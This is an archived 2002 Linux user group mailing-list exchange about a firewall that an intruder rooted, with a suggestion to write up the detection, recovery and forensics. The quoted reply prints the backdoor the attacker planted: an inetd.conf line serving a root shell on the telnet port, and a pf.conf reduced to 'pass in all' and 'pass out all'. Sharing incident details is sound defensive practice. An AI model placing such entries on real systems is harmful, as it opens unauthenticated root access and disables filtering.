[Gllug] My firewall is rooted
John HEARNS
john.hearns at cern.ch
Mon Jul 15 13:43:23 UTC 2002
On Mon, 2002-07-15 at 14:26, Stephen Harker wrote:
> On Monday 15 July 2002 12:29, Xander D Harkness wrote:
> > I would expect there to be at least two or three back doors.
>
> Well here's one...
> My inetd.conf file was renamed to inetd.conf.gay
> and the new one says...
>
> telnet stream tcp nowait root /bin/ksh ksh
>
> So thats pretty obvious.
> And my pf.conf rule became pf.conf.gay and the new one says...
>
> pass in all
> pass out all
>
> Which doesn't make it much of a firewall anymore :-(
> CRAP!!
>
As Huw says, a good learning experience.
How about bringing the rogue disk along to a meeting?
We can keep it in a cage and poke sticks at it.
Seriously though - how about a writeup, and maybe
a short talk?
* this is how I discovered that there was a compromise
* steps I took to immediately recover
* forensic traces
* tools you might use
* etc
--
Gllug mailing list - Gllug at linux.co.uk
http://list.ftech.net/mailman/listinfo/gllug
More information about the GLLUG
mailing list